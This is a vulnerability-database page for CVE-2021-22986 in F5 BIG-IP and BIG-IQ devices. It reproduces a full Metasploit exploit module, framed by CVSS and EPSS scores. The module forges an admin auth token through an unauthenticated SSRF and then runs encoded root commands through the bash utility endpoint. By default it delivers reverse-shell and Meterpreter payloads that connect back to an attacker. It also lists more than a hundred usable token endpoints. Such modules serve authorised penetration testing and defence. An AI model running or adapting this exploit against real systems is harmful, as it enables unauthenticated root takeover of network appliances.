Lucene search

K
metasploitWvu <[email protected]>, Rich WarrenMSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_REST_SSRF_RCE-
HistoryMar 31, 2021 - 7:02 p.m.

F5 iControl REST Unauthenticated SSRF Token Generation RCE

2021-03-3119:02:32
wvu <[email protected]>, Rich Warren
www.rapid7.com
63

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

This module exploits a pre-auth SSRF in the F5 iControl REST API’s /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device. This vulnerability is known as CVE-2021-22986. CVE-2021-22986 affects the following BIG-IP versions: * 12.1.0 - 12.1.5 * 13.1.0 - 13.1.3 * 14.1.0 - 14.1.3 * 15.1.0 - 15.1.2 * 16.0.0 - 16.0.1 And the following BIG-IQ versions: * 6.0.0 - 6.1.0 * 7.0.0 * 7.1.0 Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',
        'Description' => %q{
          This module exploits a pre-auth SSRF in the F5 iControl REST API's
          /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that
          can be used to execute root commands on an affected BIG-IP or BIG-IQ
          device. This vulnerability is known as CVE-2021-22986.

          CVE-2021-22986 affects the following BIG-IP versions:

          * 12.1.0 - 12.1.5
          * 13.1.0 - 13.1.3
          * 14.1.0 - 14.1.3
          * 15.1.0 - 15.1.2
          * 16.0.0 - 16.0.1

          And the following BIG-IQ versions:

          * 6.0.0 - 6.1.0
          * 7.0.0
          * 7.1.0

          Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.
        },
        'Author' => [
          'wvu', # Analysis and exploit
          'Rich Warren' # First blood (RCE) and endpoint collaboration
        ],
        'References' => [
          ['CVE', '2021-22986'],
          ['URL', 'https://support.f5.com/csp/article/K03009991'],
          ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],
          ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']
          # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html
        ],
        'DisclosureDate' => '2021-03-10', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :bourne,
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
          'SideEffects' => [
            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)
            ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie
            ARTIFACTS_ON_DISK # CmdStager
          ]
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),
      OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])
    ])

    register_advanced_options([
      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
    ])
  end

  def username
    datastore['USERNAME']
  end

  def user_reference_endpoint
    normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)
  end

  def check
    generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe
  end

  def exploit
    return unless (@token ||= generate_token_ssrf)

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def generate_token_ssrf
    print_status('Generating token via SSRF...')
    vprint_status("Username: #{username}")
    vprint_status("Endpoint: #{login_reference_endpoint}")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),
      'ctype' => 'application/json',
      'data' => {
        'username' => username,
        'bigipAuthCookie' => '',
        'authProviderName' => 'local',
        'loginReference' => {
          'link' => "https://localhost#{login_reference_endpoint}"
        },
        'userReference' => {
          'link' => "https://localhost#{user_reference_endpoint}"
        }
      }.to_json
    )

    unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))
      print_error('Failed to generate token')
      return
    end

    print_good("Successfully generated token: #{@token}")
    @token
  end

  def execute_command(cmd, _opts = {})
    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"

    print_status("Executing command: #{bash_cmd}")

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),
      'ctype' => 'application/json',
      'headers' => {
        'X-F5-Auth-Token' => @token
      },
      'data' => {
        'command' => 'run',
        'utilCmdArgs' => "-c '#{bash_cmd}'"
      }.to_json
    }, datastore['CmdExecTimeout'])

    unless res
      print_warning('Command execution timed out')
      return
    end

    json = res.get_json_document

    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'
      fail_with(Failure::PayloadFailed, 'Failed to execute command')
    end

    print_good('Successfully executed command')

    return unless (cmd_result = json['commandResult'])

    vprint_line(cmd_result)
  end

  def login_reference_endpoint
    if datastore['ENDPOINT']
      return normalize_uri(target_uri.path, datastore['ENDPOINT'])
    end

    @token_generation_endpoint ||= token_generation_endpoints.sample

    normalize_uri(target_uri.path, @token_generation_endpoint)
  end

  # Usable token generation endpoints between versions 12.1.4 and 16.0.1
  def token_generation_endpoints
    %w[
      /access/file-path-manager/indexing
      /cm/autodeploy/cluster-software-images/indexing
      /cm/autodeploy/qkview/indexing
      /cm/autodeploy/software-images/indexing
      /cm/autodeploy/software-volume-install/indexing
      /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing
      /cm/system/authn/providers/tmos/indexing
      /mgmt/shared/analytics/avr-proxy-tasks
      /mgmt/shared/gossip
      /mgmt/shared/gossip-peer-refresher
      /mgmt/shared/identified-devices/config/device-refresh
      /mgmt/shared/save-config
      /mgmt/tm/shared/bigip-failover-state
      /shared/analytics/avr-proxy-tasks
      /shared/analytics/avr-proxy-tasks/indexing
      /shared/analytics/event-aggregation-tasks/indexing
      /shared/analytics/event-analysis-tasks/indexing
      /shared/authn/providers/local/groups/indexing
      /shared/authz/remote-resources/indexing
      /shared/authz/resource-groups/indexing
      /shared/authz/roles/indexing
      /shared/authz/tokens/indexing
      /shared/chassis-framework-upgrades/indexing
      /shared/device-discovery-tasks/indexing
      /shared/device-group-key-pairs/indexing
      /shared/echo/indexing
      /shared/framework-info-tasks/indexing
      /shared/framework-upgrades/indexing
      /shared/gossip
      /shared/gossip-peer-refresher
      /shared/group-task/indexing
      /shared/iapp/blocks/indexing
      /shared/iapp/build-package/indexing
      /shared/iapp/health-prefix-map/indexing
      /shared/iapp/package-management-tasks/indexing
      /shared/iapp/template-loader/indexing
      /shared/identified-devices/config/device-refresh
      /shared/nodejs/loader-path-config/indexing
      /shared/package-deployments/indexing
      /shared/resolver/device-groups/indexing
      /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing
      /shared/root-framework-upgrades/indexing
      /shared/rpm-tasks/indexing
      /shared/save-config
      /shared/snapshot-task/indexing
      /shared/snapshot/indexing
      /shared/stats-information/indexing
      /shared/storage/tasks/indexing
      /shared/task-scheduler/scheduler/indexing
      /shared/tmsh-shell/indexing
      /tm/analytics/afm-sweeper/generate-report/indexing
      /tm/analytics/afm-sweeper/report-results/indexing
      /tm/analytics/application-security-anomalies/generate-report/indexing
      /tm/analytics/application-security-anomalies/report-results/indexing
      /tm/analytics/application-security-network/generate-report/indexing
      /tm/analytics/application-security-network/report-results/indexing
      /tm/analytics/application-security/generate-report/indexing
      /tm/analytics/application-security/report-results/indexing
      /tm/analytics/asm-bypass/generate-report/indexing
      /tm/analytics/asm-bypass/report-results/indexing
      /tm/analytics/asm-cpu/generate-report/indexing
      /tm/analytics/asm-cpu/report-results/indexing
      /tm/analytics/asm-memory/generate-report/indexing
      /tm/analytics/asm-memory/report-results/indexing
      /tm/analytics/cpu/generate-report/indexing
      /tm/analytics/cpu/report-results/indexing
      /tm/analytics/disk-info/generate-report/indexing
      /tm/analytics/disk-info/report-results/indexing
      /tm/analytics/dns/generate-report/indexing
      /tm/analytics/dns/report-results/indexing
      /tm/analytics/dos-l3/generate-report/indexing
      /tm/analytics/dos-l3/report-results/indexing
      /tm/analytics/http/generate-report/indexing
      /tm/analytics/http/report-results/indexing
      /tm/analytics/ip-intelligence/generate-report/indexing
      /tm/analytics/ip-intelligence/report-results/indexing
      /tm/analytics/ip-layer/generate-report/indexing
      /tm/analytics/ip-layer/report-results/indexing
      /tm/analytics/lsn-pool/generate-report/indexing
      /tm/analytics/lsn-pool/report-results/indexing
      /tm/analytics/memory/generate-report/indexing
      /tm/analytics/memory/report-results/indexing
      /tm/analytics/network/generate-report/indexing
      /tm/analytics/network/report-results/indexing
      /tm/analytics/pem/generate-report/indexing
      /tm/analytics/pem/report-results/indexing
      /tm/analytics/proc-cpu/generate-report/indexing
      /tm/analytics/proc-cpu/report-results/indexing
      /tm/analytics/protocol-security-http/generate-report/indexing
      /tm/analytics/protocol-security-http/report-results/indexing
      /tm/analytics/protocol-security/generate-report/indexing
      /tm/analytics/protocol-security/report-results/indexing
      /tm/analytics/sip/generate-report/indexing
      /tm/analytics/sip/report-results/indexing
      /tm/analytics/swg-blocked/generate-report/indexing
      /tm/analytics/swg-blocked/report-results/indexing
      /tm/analytics/swg/generate-report/indexing
      /tm/analytics/swg/report-results/indexing
      /tm/analytics/tcp-analytics/generate-report/indexing
      /tm/analytics/tcp-analytics/report-results/indexing
      /tm/analytics/tcp/generate-report/indexing
      /tm/analytics/tcp/report-results/indexing
      /tm/analytics/udp/generate-report/indexing
      /tm/analytics/udp/report-results/indexing
      /tm/analytics/vcmp/generate-report/indexing
      /tm/analytics/vcmp/report-results/indexing
      /tm/analytics/virtual/generate-report/indexing
      /tm/analytics/virtual/report-results/indexing
      /tm/shared/bigip-failover-state
      /tm/shared/sys/backup/indexing
    ]
  end

end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%